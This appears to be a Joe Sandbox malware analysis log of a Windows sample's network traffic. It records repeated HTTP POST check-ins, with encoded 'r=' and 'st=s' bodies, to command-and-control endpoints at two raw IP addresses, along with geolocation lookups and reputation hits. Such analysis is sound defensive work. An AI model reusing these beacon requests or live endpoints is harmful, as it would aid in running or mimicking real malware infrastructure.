Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View IP Address: 193.233.132.56 193.233.132.56
Source: Joe Sandbox View IP Address: 193.233.132.56 193.233.132.56
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C4D8D0 recv,recv,recv,recv, 0_2_00C4D8D0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Gdo9tp536UW6kVN&MD=MgdmHMVh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Gdo9tp536UW6kVN&MD=MgdmHMVh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-58101590&timestamp=1713476419682 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=Lwkr3AZE7EM; VISITOR_INFO1_LIVE=g9_VWJYh6aY; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgYQ%3D%3D
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCPnA1BUIpu3MIhj2yc0BGNXdzQEY0/7NARjYhs4BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
